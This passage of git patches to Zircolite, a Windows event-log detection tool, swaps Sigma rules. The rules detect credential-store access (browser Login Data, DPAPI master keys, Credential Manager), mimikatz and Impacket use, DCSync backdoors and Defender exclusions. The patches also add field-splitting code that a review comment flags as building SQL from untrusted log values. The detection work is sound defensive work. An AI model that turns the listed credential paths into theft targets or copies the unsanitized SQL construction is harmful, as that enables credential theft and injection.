ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" ], - "filename": "file_delete_win_delete_backup_file.yml" + "filename": "win_security_susp_possible_shadow_credentials_added.yml" }, { - "title": "PowerShell Console History Logs Deleted", - "id": "ff301988-c231-4bd0-834c-ac9d73b86586", + "title": "Access Token Abuse", + "id": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", "status": "experimental", - "description": 
"Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "This rule tries to detect token impersonation and theft. (Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", + "author": "Michaela Adams, Zach Mathis", "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.privilege_escalation", + "attack.t1134.001" ], "falsepositives": [ - "Unknown" + "Anti-Virus" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'Advapi' AND AuthenticationPackageName = 'Negotiate' AND ImpersonationLevel LIKE '\\%\\%1833' ESCAPE '\\')" ], - "filename": "file_delete_win_delete_powershell_command_history.yml" + "filename": "win_security_access_token_abuse.yml" }, { - "title": "IIS WebServer Access Logs Deleted", - "id": "3eb8c339-a765-48cc-a150-4364c04652bf", + "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", + "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", "status": "experimental", - "description": "Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence", - "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", + "author": "Bartlomiej Czyz, Relativity", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "During 
uninstallation of the IIS service", - "During log rotation" + "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\inetpub\\\\logs\\\\LogFiles\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.log' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" ], - "filename": "file_delete_win_delete_iis_access_logs.yml" + "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" }, { - "title": "Tomcat WebServer Logs Deleted", - "id": "270185ff-5f50-4d6d-a27f-24c3b8c9fef8", + "title": "Possible PetitPotam Coerce Authentication Attempt", + "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", "status": "experimental", - "description": "Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect PetitPotam coerced authentication activity.", + "author": "Mauricio Velazco, Michael Haag", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.credential_access", + "attack.t1187" ], "falsepositives": [ - "During uninstallation of the tomcat server", - "During log rotation" + "Unknown. Feedback welcomed." 
], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Tomcat%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\logs\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%catalina.%' ESCAPE '\\' OR TargetFilename LIKE '%\\_access\\_log.%' ESCAPE '\\' OR TargetFilename LIKE '%localhost.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" ], - "filename": "file_delete_win_delete_tomcat_logs.yml" + "filename": "win_security_petitpotam_network_share.yml" }, { - "title": "EventLog EVTX File Deleted", - "id": "63c779ba-f638-40a0-a593-ddd45e8b1ddc", + "title": "Suspicious Scheduled Task Update", + "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", "status": "experimental", - "description": "Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence", + "description": "Detects update to a scheduled task event that contain suspicious keywords.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.evtx' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE 
'%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_delete_win_delete_event_log_files.yml" + "filename": "win_security_susp_scheduled_task_update.yml" }, { - "title": "Exchange PowerShell Cmdlet History Deleted", - "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", - "status": "experimental", - "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Windows Defender Exclusion Set", + "id": 
"e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "status": "test", + "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", + "author": "@BarryShooshooga", "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.t1562.001" ], "falsepositives": [ - "Possible FP during log rotation" + "Intended inclusions by administrator" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" - ], - "filename": "file_delete_win_delete_exchange_powershell_logs.yml" - }, - { - "title": "Suspicious Access To Browser Credential Files", - "id": "91cb43db-302a-47e3-b3c8-7ede481e27bf", - "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", - "author": "frack113", - "tags": [ - "attack.t1003", - "attack.credential_access" - ], - "falsepositives": [ - "Antivirus, Anti-Spyware, Anti-Malware Software", - "Backup software", - "Software installed on other partitions other than \"C:\\\"", - "Searching software such as \"everything.exe\" that are installed and are not located in one of the \"filter_programfile\" filter entries" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (((FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Network\\\\Cookies%' ESCAPE '\\' OR FileName LIKE '%\\\\Appdata\\\\Local\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Local State%' ESCAPE '\\') OR (FileName LIKE '%\\\\Appdata\\\\Local\\\\Microsoft\\\\Windows\\\\WebCache\\\\WebCacheV01.dat' ESCAPE '\\' 
OR FileName LIKE '%\\\\cookies.sqlite' ESCAPE '\\' OR FileName LIKE '%release\\\\key3.db' ESCAPE '\\' OR FileName LIKE '%release\\\\key4.db' ESCAPE '\\' OR FileName LIKE '%release\\\\logins.json' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\MpCopyAccelerator.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR (Image = 'System' AND ParentImage = 'Idle')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" ], - "filename": "file_access_win_browser_credential_stealing.yml" + "filename": "win_security_defender_bypass.yml" }, { - "title": "Suspicious Access To Windows Credential History File", - "id": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", - "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. 
Example case would be usage of mimikatz \"dpapi::credhist\" function\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Azure AD Health Service Agents Registry Keys Access", + "id": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", + "status": "test", + "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.discovery", + "attack.t1012" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (FileName LIKE '%\\\\Microsoft\\\\Protect\\\\CREDHIST' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\ADHealthAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE 
'%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" ], - "filename": "file_access_win_susp_cred_hist_access.yml" + "filename": "win_security_aadhealth_svc_agent_regkey_access.yml" }, { - "title": "Credential Manager Access", - "id": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", + "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", + "id": "2c99737c-585d-4431-b61a-c911d86ff32f", "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", + "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", "tags": [ - "attack.t1003", - "attack.credential_access" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." + "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." 
], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\ProgramData\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" ], - "filename": "file_access_win_credential_manager_stealing.yml" + "filename": "win_security_account_backdoor_dcsync_rights.yml" }, { - "title": "Suspicious Access To Windows DPAPI Master Keys", - "id": "46612ae6-86be-4802-bc07-39b59feb1309", - "status": "experimental", - "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. 
Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", + "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-18\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-21-%' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "file_access_win_dpapi_master_key_access.yml" + "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" } ] diff --git a/zircolite.py b/zircolite.py index 1af1880..5d196c9 100755 --- a/zircolite.py +++ b/zircolite.py 
@@ -545,6 +545,8 @@ def __init__(
 self.fieldExclusions = self.fieldMappingsDict["exclusions"]
 self.fieldMappings = self.fieldMappingsDict["mappings"]
 self.uselessValues = self.fieldMappingsDict["useless"]
+ self.aliases = self.fieldMappingsDict["alias"]
+ self.fieldSplitList = self.fieldMappingsDict["split"]
 
 def run(self, file):
 """
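Review bot: The two added lines index `self.fieldMappingsDict` with the new "alias" and "split" keys unconditionally, so a field-mappings file written before this change (any custom file passed as `configFile` that predates the updated config/fieldMappings.json) now raises KeyError in `__init__` instead of loading. Reading them with a default keeps older configs working: `self.aliases = self.fieldMappingsDict.get("alias", {})` and `self.fieldSplitList = self.fieldMappingsDict.get("split", {})`. The same applies to the matching `__init__` hunk in zircolite_dev.py. `__init__` starts and ends outside the hunk.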
@@ -575,26 +577,65 @@ def flatten(x, name=""):
 # Excluding useless values (e.g. "null"). The value must be an exact match.
 if not value in self.uselessValues:
 # Applying field mappings
- if name[:-1] in self.fieldMappings:
- key = self.fieldMappings[name[:-1]]
+ rawFieldName = name[:-1]
+ if rawFieldName in self.fieldMappings:
+ key = self.fieldMappings[rawFieldName]
 else:
 # Removing all annoying character from field name
 key = "".join(
- e for e in name[:-1].split(".")[-1] if e.isalnum()
+ e for e in rawFieldName.split(".")[-1] if e.isalnum()
 )
- JSONLine[key] = value
- # Creating the CREATE TABLE SQL statement
- if key.lower() not in self.keyDict:
- self.keyDict[key.lower()] = key
- if type(value) is int:
- fieldStmt += f"'{key}' INTEGER,\n"
- else:
- fieldStmt += f"'{key}' TEXT COLLATE NOCASE,\n"
+
+ # Preparing aliases
+ keys = [key]
+ if key in self.aliases:
+ keys.append(self.aliases[key])
+ if rawFieldName in self.aliases:
+ keys.append(self.aliases[rawFieldName])
+
+ # Applying field splitting
+ fieldsToSplit = []
+ if rawFieldName in self.fieldSplitList:
+ fieldsToSplit.append(rawFieldName)
+ if key in self.fieldSplitList:
+ fieldsToSplit.append(key)
+
+ if len(fieldsToSplit) > 0:
+ for field in fieldsToSplit:
+ try:
+ splittedFields = value.split(
+ self.fieldSplitList[field]["separator"]
+ )
+ for splittedField in splittedFields:
+ k, v = splittedField.split(
+ self.fieldSplitList[field]["equal"]
+ )
+ keyLower = k.lower()
+ JSONLine[k] = v
+ if keyLower not in self.keyDict:
+ self.keyDict[keyLower] = k
+ fieldStmt += f"'{k}' TEXT COLLATE NOCASE,\n"
+ except Exception as e:
+ self.logger.error(
+ f"ERROR : Couldn't apply field splitting {e}"
+ )
+
+ # Applying aliases
+ for key in keys:
+ JSONLine[key] = value
+ # Creating the CREATE TABLE SQL statement
+ keyLower = key.lower()
+ if keyLower not in self.keyDict:
+ self.keyDict[keyLower] = key
+ if type(value) is int:
+ fieldStmt += f"'{key}' INTEGER,\n"
+ else:
+ fieldStmt += f"'{key}' TEXT COLLATE NOCASE,\n"
 
 # If filesize is not zero
 if os.stat(file).st_size != 0:
 with open(str(file), "r", encoding="utf-8") as JSONFile:
- filename = str(file).split(os.path.sep)[1]
+ filename = os.path.basename(file)
 for line in JSONFile:
 try:
 dictToFlatten = json.loads(line)
diff --git a/zircolite_dev.py b/zircolite_dev.py
index 4066f1a..37acfa8 100755
--- a/zircolite_dev.py
+++ b/zircolite_dev.py
@@ -357,6 +357,8 @@ def __init__(self, configFile, logger=None, timeAfter="1970-01-01T00:00:00", tim
 self.fieldExclusions = self.fieldMappingsDict["exclusions"]
 self.fieldMappings = self.fieldMappingsDict["mappings"]
 self.uselessValues = self.fieldMappingsDict["useless"]
+ self.aliases = self.fieldMappingsDict["alias"]
+ self.fieldSplitList = self.fieldMappingsDict["split"]
 
 def run(self, file):
 """
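Review bot: The sub-field names produced by the new splitting block (`k` in `k, v = splittedField.split(...)`) are taken verbatim from the log value and written unsanitized into `JSONLine` and into the `CREATE TABLE` text via `fieldStmt += f"'{k}' TEXT COLLATE NOCASE,\n"`, whereas every other column name either comes from the mappings config or passes through the `isalnum()` filter a few lines above. Log contents are untrusted input, so a quote or other unexpected character in a value such as Sysmon's `Hashes` reaches the SQL statement and can break it or inject unintended SQL into the table definition. A value containing a second occurrence of the equal character also makes the two-target unpacking raise ValueError, which the broad `except Exception` then logs at error level for every such event. Suggested: `k, v = splittedField.split(self.fieldSplitList[field]["equal"], 1)` followed by `k = "".join(e for e in k.strip() if e.isalnum())`, skipping the entry when `k` ends up empty. The same applies to the matching hunk in zircolite_dev.py; `flatten` and `run` both start outside the hunk.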
@@ -385,23 +387,53 @@ def flatten(x, name=''):
 # Excluding useless values (e.g. "null"). The value must be an exact match.
 if not value in self.uselessValues:
 # Applying field mappings
- if name[:-1] in self.fieldMappings:
- key = self.fieldMappings[name[:-1]]
+ rawFieldName = name[:-1]
+ if rawFieldName in self.fieldMappings:
+ key = self.fieldMappings[rawFieldName]
 else:
 # Removing all annoying character from field name
- key = ''.join(e for e in name[:-1].split(".")[-1] if e.isalnum())
- JSONLine[key] = value
- # Creating the CREATE TABLE SQL statement
- if key.lower() not in self.keyDict:
- self.keyDict[key.lower()] = key
- if type(value) is int:
- fieldStmt += f"'{key}' INTEGER,\n"
- else:
- fieldStmt += f"'{key}' TEXT COLLATE NOCASE,\n"
+ key = ''.join(e for e in rawFieldName.split(".")[-1] if e.isalnum())
+
+ # Preparing aliases
+ keys = [key]
+ if key in self.aliases: keys.append(self.aliases[key])
+ if rawFieldName in self.aliases: keys.append(self.aliases[rawFieldName])
+
+ # Applying field splitting
+ fieldsToSplit = []
+ if rawFieldName in self.fieldSplitList: fieldsToSplit.append(rawFieldName)
+ if key in self.fieldSplitList: fieldsToSplit.append(key)
+
+ if len(fieldsToSplit) > 0:
+ for field in fieldsToSplit:
+ try:
+ splittedFields = value.split(self.fieldSplitList[field]["separator"])
+ for splittedField in splittedFields:
+ k,v = splittedField.split(self.fieldSplitList[field]["equal"])
+ keyLower = k.lower()
+ JSONLine[k] = v
+ if keyLower not in self.keyDict:
+ self.keyDict[keyLower] = k
+ fieldStmt += f"'{k}' TEXT COLLATE NOCASE,\n"
+ except Exception as e:
+ self.logger.error(f"ERROR : Couldn't apply field splitting {e}")
+
+ # Applying aliases
+ for key in keys:
+ JSONLine[key] = value
+ # Creating the CREATE TABLE SQL statement
+ keyLower =key.lower()
+ if keyLower not in self.keyDict:
+ self.keyDict[keyLower] = key
+ if type(value) is int:
+ fieldStmt += f"'{key}' INTEGER,\n"
+ else:
+ fieldStmt += f"'{key}' TEXT COLLATE NOCASE,\n"
+
 # If filesize is not zero
 if os.stat(file).st_size != 0:
 with open(str(file), 'r', encoding='utf-8') as JSONFile:
- filename = str(file).split(os.path.sep)[1]
+ filename = os.path.basename(file)
 for line in JSONFile:
 try:
 dictToFlatten = json.loads(line)
From c53a2fc99279570477103ac7eb9373333aa49c66 Mon Sep 17 00:00:00 2001
From: wagga40 <6437862+wagga40@users.noreply.github.com>
Date: Tue, 2 May 2023 22:40:15 +0200
Subject: [PATCH 2/3] Update docs
---
 docs/Usage.md | 34 +++++++++++++++++-----------------
 docs/Zircolite_manual.pdf | Bin 669757 -> 669742 bytes
 2 files changed, 17 insertions(+), 17 deletions(-)
diff --git a/docs/Usage.md b/docs/Usage.md
index fb79d71..e09d146 100644
--- a/docs/Usage.md
+++ b/docs/Usage.md
@@ -198,14 +198,14 @@ Please keep in mind that as opposed to field alias, the original field name is n
 Let's say you have this event log in JSON format (the event has been deliberately truncated):
 
 ```json
- {
- "EventID": 1,
- "Provider_Name": "Microsoft-Windows-Sysmon",
- "Channel": "Microsoft-Windows-Sysmon/Operational",
- "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"",
- "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
- "IntegrityLevel": "Medium",
- }
+{
+ "EventID": 1,
+ "Provider_Name": "Microsoft-Windows-Sysmon",
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"",
+ "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
+ "IntegrityLevel": "Medium",
+}
 ```
 
 Let's say you are not sure all your rules use the "CommandLine" field but you remember that some of them use the "cmdline" field. To avoid any problems you could use an alias for the "CommandLine" field like this :
@@ -225,15 +225,15 @@ Let's say you are not sure all your rules use the "CommandLine" field but you re With this configuration, the event log used to apply Sigma rules will look like this : ```json - { - "EventID": 1, - "Provider_Name": "Microsoft-Windows-Sysmon", - "Channel": "Microsoft-Windows-Sysmon/Operational", - "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", - "cmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", - "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "IntegrityLevel": "Medium", - } +{ + "EventID": 1, + "Provider_Name": "Microsoft-Windows-Sysmon", + "Channel": "Microsoft-Windows-Sysmon/Operational", + "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", + "cmdline": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", + "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "IntegrityLevel": "Medium", +} ``` Be careful when using aliases because the data is stored multiple times. 
